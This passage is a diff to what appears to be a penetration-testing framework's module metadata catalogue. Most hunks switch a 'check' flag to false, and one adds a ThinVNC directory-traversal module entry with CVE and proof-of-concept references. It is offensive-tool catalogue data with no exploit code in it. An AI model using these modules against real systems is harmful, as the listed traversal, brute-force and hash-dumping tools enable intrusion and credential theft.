+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27920,7 +28350,7 @@
     "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/phpmyadmin_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -27966,7 +28396,7 @@
     "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/pocketpad_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28012,7 +28442,7 @@
     "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/prev_dir_same_name_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28058,7 +28488,7 @@
     "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/radware_appdirector_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -28105,7 +28535,7 @@
     "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rails_json_yaml_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28151,7 +28581,7 @@
     "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rails_mass_assignment",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28199,7 +28629,7 @@
     "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rails_xml_yaml_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28245,7 +28675,7 @@
     "path": "/modules/auxiliary/scanner/http/replace_ext.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/replace_ext",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28292,7 +28722,7 @@
     "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rewrite_proxy_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28338,7 +28768,7 @@
     "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rfcode_reader_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28386,7 +28816,7 @@
     "path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rips_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28433,7 +28863,7 @@
     "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -28479,7 +28909,7 @@
     "path": "/modules/auxiliary/scanner/http/robots_txt.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/robots_txt",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28527,7 +28957,7 @@
     "path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/s40_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28573,7 +29003,7 @@
     "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sap_businessobjects_user_brute",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28620,7 +29050,7 @@
     "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sap_businessobjects_user_brute_web",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28666,7 +29096,7 @@
     "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sap_businessobjects_user_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28712,7 +29142,7 @@
     "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sap_businessobjects_version_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28758,7 +29188,7 @@
     "path": "/modules/auxiliary/scanner/http/scraper.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/scraper",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28804,7 +29234,7 @@
     "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sentry_cdu_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -28850,7 +29280,7 @@
     "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/servicedesk_plus_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28896,7 +29326,7 @@
     "path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sevone_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -28946,7 +29376,7 @@
     "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/simple_webserver_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -28996,7 +29426,7 @@
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_49152_exposure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29045,7 +29475,7 @@
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29084,7 +29514,7 @@
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29132,7 +29562,7 @@
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -29178,7 +29608,7 @@
     "path": "/modules/auxiliary/scanner/http/soap_xml.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/soap_xml",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29225,7 +29655,7 @@
     "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sockso_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29272,7 +29702,7 @@
     "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/splunk_web_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -29320,7 +29750,7 @@
     "path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/springcloud_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29366,7 +29796,7 @@
     "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/squid_pivot_scanning",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29413,7 +29843,7 @@
     "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/squiz_matrix_user_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29452,7 +29882,7 @@
     "path": "/modules/auxiliary/scanner/http/ssl.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ssl",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29500,7 +29930,7 @@
     "path": "/modules/auxiliary/scanner/http/ssl_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ssl_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29550,7 +29980,7 @@
     "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/support_center_plus_directory_traversal",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -29642,7 +30072,7 @@
     "path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/svn_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29688,7 +30118,7 @@
     "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/svn_wcdb_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29738,7 +30168,7 @@
     "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/sybase_easerver_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29786,7 +30216,7 @@
     "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -29837,7 +30267,7 @@
     "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/symantec_brightmail_logfile",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -29883,13 +30313,64 @@
     "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/symantec_web_gateway_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/thinvnc_traversal": {
+    "name": "ThinVNC Directory Traversal",
+    "fullname": "auxiliary/scanner/http/thinvnc_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-10-16",
+    "type": "auxiliary",
+    "author": [
+      "jinxbox",
+      "WarMarX",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a directory traversal vulnerability in ThinVNC\n        versions 1.0b1 and prior which allows unauthenticated users to retrieve\n        arbitrary files, including the ThinVNC configuration file.\n\n        This module has been tested successfully on ThinVNC versions 1.0b1\n        and \"ThinVNC_Latest\" (2018-12-07).",
+    "references": [
+      "CVE-2019-17662",
+      "URL-https://github.com/bewest/thinvnc/issues/5",
+      "URL-https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py",
+      "URL-https://redteamzone.com/ThinVNC/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-10-17 07:44:19 +0000",
+    "path": "/modules/auxiliary/scanner/http/thinvnc_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/thinvnc_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/titan_ftp_admin_pwd": {
     "name": "Titan FTP Administrative Password Disclosure",
     "fullname": "auxiliary/scanner/http/titan_ftp_admin_pwd",
@@ -29929,7 +30410,7 @@
     "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/titan_ftp_admin_pwd",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -29975,7 +30456,7 @@
     "path": "/modules/auxiliary/scanner/http/title.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/title",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30024,7 +30505,7 @@
     "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/tomcat_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -30093,7 +30574,7 @@
     "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/tomcat_mgr_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -30193,7 +30674,7 @@
     "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/tplink_traversal_noauth",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30241,7 +30722,7 @@
     "path": "/modules/auxiliary/scanner/http/trace.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/trace",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30287,7 +30768,7 @@
     "path": "/modules/auxiliary/scanner/http/trace_axd.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/trace_axd",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30333,7 +30814,7 @@
     "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/typo3_bruteforce",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -30379,7 +30860,7 @@
     "path": "/modules/auxiliary/scanner/http/vcms_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/vcms_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -30425,7 +30906,7 @@
     "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/verb_auth_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30471,7 +30952,7 @@
     "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/vhost_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30518,7 +30999,7 @@
     "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wangkongbao_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30564,7 +31045,7 @@
     "path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/web_vulndb",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30610,7 +31091,7 @@
     "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/webdav_internal_ip",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30656,7 +31137,7 @@
     "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/webdav_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30702,7 +31183,7 @@
     "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/webdav_website_content",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30750,7 +31231,7 @@
     "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/webpagetest_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30799,7 +31280,7 @@
     "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wildfly_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30900,7 +31381,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_cp_calendar_sqli",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -30954,7 +31435,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_ghost_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31004,7 +31485,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_login_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31053,7 +31534,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_multicall_creds",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31104,7 +31585,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_pingback_access",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31150,7 +31631,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31198,7 +31679,7 @@
     "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wordpress_xmlrpc_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31298,7 +31779,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_contus_video_gallery_sqli",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31318,7 +31799,7 @@
       "Kacper Szurek",
       "Roberto Soares Espreto <robertoespreto@gmail.com>"
     ],
-    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n        \"DukaPress\" version 2.5.2, allowing to read arbitrary files with the\n        web server privileges.",
+    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n        \"DukaPress\" version <= 2.5.3, allowing to read arbitrary files with the\n        web server privileges.",
     "references": [
       "EDB-35346",
       "CVE-2014-8799",
@@ -31344,11 +31825,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-10 15:05:57 +0000",
     "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_dukapress_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31396,7 +31877,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_gimedia_library_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31445,7 +31926,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31493,7 +31974,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_mobileedition_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31541,7 +32022,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_nextgen_galley_file_read",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31589,7 +32070,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_simple_backup_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31638,7 +32119,7 @@
     "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/wp_subscribe_comments_file_read",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31684,7 +32165,7 @@
     "path": "/modules/auxiliary/scanner/http/xpath.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/xpath",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31732,7 +32213,7 @@
     "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/yaws_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31778,7 +32259,7 @@
     "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zabbix_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -31825,7 +32306,7 @@
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31872,7 +32353,7 @@
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31913,7 +32394,7 @@
     "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
     "is_install_path": true,
     "ref_name": "scanner/ike/cisco_ike_benigncertain",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31950,7 +32431,7 @@
     "path": "/modules/auxiliary/scanner/imap/imap_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/imap/imap_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -31987,7 +32468,7 @@
     "path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
     "is_install_path": true,
     "ref_name": "scanner/ip/ipidseq",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32029,7 +32510,7 @@
     "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
     "is_install_path": true,
     "ref_name": "scanner/ipmi/ipmi_cipher_zero",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32071,7 +32552,7 @@
     "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
     "is_install_path": true,
     "ref_name": "scanner/ipmi/ipmi_dumphashes",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -32109,7 +32590,7 @@
     "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/ipmi/ipmi_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32184,7 +32665,7 @@
     "path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/kademlia/server_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32221,7 +32702,7 @@
     "path": "/modules/auxiliary/scanner/llmnr/query.rb",
     "is_install_path": true,
     "ref_name": "scanner/llmnr/query",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32267,7 +32748,7 @@
     "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
     "is_install_path": true,
     "ref_name": "scanner/lotus/lotus_domino_hashes",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -32313,7 +32794,7 @@
     "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/lotus/lotus_domino_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -32359,7 +32840,7 @@
     "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/lotus/lotus_domino_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32396,7 +32877,7 @@
     "path": "/modules/auxiliary/scanner/mdns/query.rb",
     "is_install_path": true,
     "ref_name": "scanner/mdns/query",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32436,7 +32917,7 @@
     "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
     "is_install_path": true,
     "ref_name": "scanner/memcached/memcached_amp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32473,7 +32954,7 @@
     "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/memcached/memcached_udp_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32510,7 +32991,7 @@
     "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/cctv_dvr_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -32552,7 +33033,7 @@
     "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/cisco_smart_install",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32592,7 +33073,7 @@
     "path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/clamav_control",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32633,7 +33114,7 @@
     "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32681,7 +33162,7 @@
     "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/dvr_config_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32719,7 +33200,7 @@
     "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/easycafe_server_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32757,7 +33238,7 @@
     "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/ib_service_mgr_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32794,7 +33275,7 @@
     "path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/ibm_mq_channel_brute",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32831,7 +33312,7 @@
     "path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/ibm_mq_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
